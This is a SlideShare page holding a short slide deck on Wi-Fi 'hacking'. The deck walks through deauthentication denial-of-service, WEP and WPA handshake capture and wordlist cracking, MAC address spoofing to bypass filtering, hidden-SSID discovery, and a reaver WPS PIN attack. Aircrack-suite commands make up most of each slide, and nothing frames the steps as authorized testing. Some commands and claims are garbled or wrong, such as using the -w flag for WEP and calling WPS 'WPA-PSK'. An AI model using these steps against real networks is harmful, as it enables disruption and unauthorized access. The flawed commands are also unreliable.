SlideShare a Scribd company logo
1 of 12
WIRELESS PENETRATION TESTING
Kamlesh Dhanwani (@_gr4y_s3c70r)
PLAN
 Introduction
 Setting up a Wifi Hacking Environment
 DOS ATTACK ON WIFI
 WEP Security
 WPA Security OR WPA2 Security
 MAC ADDRESS Filtering
 HIDDEN Network
 WPA2 (WPS available)
Introduction
 Wi-Fi is short for "wireless fidelity,"
 Wireless Standard is IEEE 802.11
 Wireless Technology made huge change the
way of communication.
 The use of this technology is increasing day
by day,worldwide
 Raising concern about security standards.
Setting up a Wifi Hacking Environment
 PC/Laptop
 Wireless Network
 Wireless Adapter(Supports Monitor mode or
packet injection)
 Kali Linux OS/Wifislax
 Aircrack-ng(Tools for pentesting wifi)
DOS ATTACK ON WIFI
 Run Kali Linux and Plug Wireless adapter
 Open terminal and type #ifconfig wlan0 down
 #iwconfig wlan0 mode monitor
 #ifconfig wlan0 up
 #airmon-ng start wlan0
 #airodump-ng wlan0
DOS ATTACK ON WIFI
 #Airodump-ng –-channel<channel number> --
bssid<bssid of network> wlan0
 #aireplay-ng –deauth 0 -a <bssid of network>
wlan0
WEP Security
 WEP stands for Wired Equivalent Privacy. This is the first security
discovered of Wi-Fi invented in 1999 and crack within the year.
 Open 3 terminal
 1)DOS ATTACK
 2)airodump-ng –channel(channel no) –bssid(Bssid of network) -w wifi
(filename for handshake file) wlan0
 3)aircrack-ng -w wifi01.cap(.cap is a extension of handshake file)
 Note:- 3 steps in 3 terminals.
WPA Security OR WPA2 Security
 When WEP become easy to crack then WPA (Wi-Fi protected
access) is discovered. It has two formats WPA and wpa2 (this is
advance). WPA is secure as compare to WEP. But there are
chances that you can’t hack it.
 WPA Hacking By Wordlist Method using crunch
 We need To Capture Handshake
 1)DOS ATTACK ON Wifi Network
 2)airodump-ng –-channel(channel number) –-bssid(bssid number)
-w (filename) wlan0(FOR CAPTURE HANDSHAKE)
 3)Crunch 8 8 12345678 -o password.txt
 4)aircrack-ng -w password.txt filename.cap
MAC ADDRESS Filtering
 In this only allowed devices are able to connect the network.
You can view the WiFi network and try to connect to the
network.
 Every device has own identity like we have our name same
way devices has Mac address.
 Every device has a unique mac address. With the help of
mac, address admin allows only his device to connect the
WiFi. All other devices are unable to connect.
 You can’t change mac address permanently but you can
change it temporarily.
MAC ADDRESS Filtering
 Capture mac adress Airodump-ng
 ifconfig wlan0 down
 ifconfig wlan0 hw ether (mac address)
 ifconfig wlan0 up
HIDDEN Network
 To connect to Hidden WiFi you just need to know Network name.
After Finding network name chose “add network/Connect to
hidden WiFi” enter name of the network. That’s It.
 In Linux Hidden Wifi showing is in lenth and in Windows It shows
Hidden Network
 Use airodump-ng for see available network
 DOS Attack on Hidden Network It shows the name of Hidden
Network
WPA2 (WPS available)
 WPS stands for wireless protected Setup but it will insecure your
network. it is also known as WPA-PSK. In this, there is 8 digit pin
you can use this pin as a password.
 airmon-ng start wlan0
 airodump-ng wlan0mon Ctrl+c
 reaver -i wlan0mon -b (BSSID) -vv -K 1
 "This method is usually works on D-Link wifi routers ,but you can
try it on other routers."

More Related Content

What's hot

Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security PresentationAllan Pratt MBA
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration TestingMohammed Adam
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
VPN (virtual private network)
VPN (virtual private network) VPN (virtual private network)
VPN (virtual private network) Netwax Lab
 
Diving into Common AWS Misconfigurations
Diving into Common AWS MisconfigurationsDiving into Common AWS Misconfigurations
Diving into Common AWS MisconfigurationsNikhil Sahoo
 
DEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICSDEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICSChris Sistrunk
 
Data Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallData Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallManish Kumar
 
Ip spoofing ppt
Ip spoofing pptIp spoofing ppt
Ip spoofing pptAnushakp9
 
Wireless Networking Security
Wireless Networking SecurityWireless Networking Security
Wireless Networking SecurityAnshuman Biswal
 
Fundamentals of IoT Security
Fundamentals of IoT SecurityFundamentals of IoT Security
Fundamentals of IoT SecuritySHAAMILIVARSAGV
 

What's hot (20)

Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security Presentation
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration Testing
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptx
 
Mobile security
Mobile securityMobile security
Mobile security
 
Securing password
Securing passwordSecuring password
Securing password
 
Vpn ppt
Vpn pptVpn ppt
Vpn ppt
 
Wireshark Tutorial
Wireshark TutorialWireshark Tutorial
Wireshark Tutorial
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and Protection
 
VPN (virtual private network)
VPN (virtual private network) VPN (virtual private network)
VPN (virtual private network)
 
Virtual Private Network VPN
Virtual Private Network VPNVirtual Private Network VPN
Virtual Private Network VPN
 
Aircrack
AircrackAircrack
Aircrack
 
Diving into Common AWS Misconfigurations
Diving into Common AWS MisconfigurationsDiving into Common AWS Misconfigurations
Diving into Common AWS Misconfigurations
 
DEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICSDEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICS
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
Data Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallData Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed Firewall
 
Ip spoofing ppt
Ip spoofing pptIp spoofing ppt
Ip spoofing ppt
 
Wireless Networking Security
Wireless Networking SecurityWireless Networking Security
Wireless Networking Security
 
Fundamentals of IoT Security
Fundamentals of IoT SecurityFundamentals of IoT Security
Fundamentals of IoT Security
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 

Similar to Wireless penetration testing

Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
Networking Fundamentals
Networking FundamentalsNetworking Fundamentals
Networking FundamentalsMD SAQUIB KHAN
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Wireless Cyber Warfare
Wireless Cyber WarfareWireless Cyber Warfare
Wireless Cyber Warfareideaflashed
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Mohammad Fareed
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Mandeep Jadon
 
Black Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsBlack Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsWang Kang
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonOWASP Delhi
 
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityFeb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityCasey Dunham
 

Similar to Wireless penetration testing (20)

Wi fi hacking
Wi fi hackingWi fi hacking
Wi fi hacking
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Wi-Fi Module
Wi-Fi ModuleWi-Fi Module
Wi-Fi Module
 
Networking Fundamentals
Networking FundamentalsNetworking Fundamentals
Networking Fundamentals
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Wireless Cyber Warfare
Wireless Cyber WarfareWireless Cyber Warfare
Wireless Cyber Warfare
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Network
NetworkNetwork
Network
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ng
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
Black Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsBlack Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
Black Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityFeb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-Security
 

Recently uploaded

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 

Recently uploaded (20)

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 

Wireless penetration testing

  • 1. WIRELESS PENETRATION TESTING Kamlesh Dhanwani (@_gr4y_s3c70r)
  • 2. PLAN  Introduction  Setting up a Wifi Hacking Environment  DOS ATTACK ON WIFI  WEP Security  WPA Security OR WPA2 Security  MAC ADDRESS Filtering  HIDDEN Network  WPA2 (WPS available)
  • 3. Introduction  Wi-Fi is short for "wireless fidelity,"  Wireless Standard is IEEE 802.11  Wireless Technology made huge change the way of communication.  The use of this technology is increasing day by day,worldwide  Raising concern about security standards.
  • 4. Setting up a Wifi Hacking Environment  PC/Laptop  Wireless Network  Wireless Adapter(Supports Monitor mode or packet injection)  Kali Linux OS/Wifislax  Aircrack-ng(Tools for pentesting wifi)
  • 5. DOS ATTACK ON WIFI  Run Kali Linux and Plug Wireless adapter  Open terminal and type #ifconfig wlan0 down  #iwconfig wlan0 mode monitor  #ifconfig wlan0 up  #airmon-ng start wlan0  #airodump-ng wlan0
  • 6. DOS ATTACK ON WIFI  #Airodump-ng –-channel<channel number> -- bssid<bssid of network> wlan0  #aireplay-ng –deauth 0 -a <bssid of network> wlan0
  • 7. WEP Security  WEP stands for Wired Equivalent Privacy. This is the first security discovered of Wi-Fi invented in 1999 and crack within the year.  Open 3 terminal  1)DOS ATTACK  2)airodump-ng –channel(channel no) –bssid(Bssid of network) -w wifi (filename for handshake file) wlan0  3)aircrack-ng -w wifi01.cap(.cap is a extension of handshake file)  Note:- 3 steps in 3 terminals.
  • 8. WPA Security OR WPA2 Security  When WEP become easy to crack then WPA (Wi-Fi protected access) is discovered. It has two formats WPA and wpa2 (this is advance). WPA is secure as compare to WEP. But there are chances that you can’t hack it.  WPA Hacking By Wordlist Method using crunch  We need To Capture Handshake  1)DOS ATTACK ON Wifi Network  2)airodump-ng –-channel(channel number) –-bssid(bssid number) -w (filename) wlan0(FOR CAPTURE HANDSHAKE)  3)Crunch 8 8 12345678 -o password.txt  4)aircrack-ng -w password.txt filename.cap
  • 9. MAC ADDRESS Filtering  In this only allowed devices are able to connect the network. You can view the WiFi network and try to connect to the network.  Every device has own identity like we have our name same way devices has Mac address.  Every device has a unique mac address. With the help of mac, address admin allows only his device to connect the WiFi. All other devices are unable to connect.  You can’t change mac address permanently but you can change it temporarily.
  • 10. MAC ADDRESS Filtering  Capture mac adress Airodump-ng  ifconfig wlan0 down  ifconfig wlan0 hw ether (mac address)  ifconfig wlan0 up
  • 11. HIDDEN Network  To connect to Hidden WiFi you just need to know Network name. After Finding network name chose “add network/Connect to hidden WiFi” enter name of the network. That’s It.  In Linux Hidden Wifi showing is in lenth and in Windows It shows Hidden Network  Use airodump-ng for see available network  DOS Attack on Hidden Network It shows the name of Hidden Network
  • 12. WPA2 (WPS available)  WPS stands for wireless protected Setup but it will insecure your network. it is also known as WPA-PSK. In this, there is 8 digit pin you can use this pin as a password.  airmon-ng start wlan0  airodump-ng wlan0mon Ctrl+c  reaver -i wlan0mon -b (BSSID) -vv -K 1  "This method is usually works on D-Link wifi routers ,but you can try it on other routers."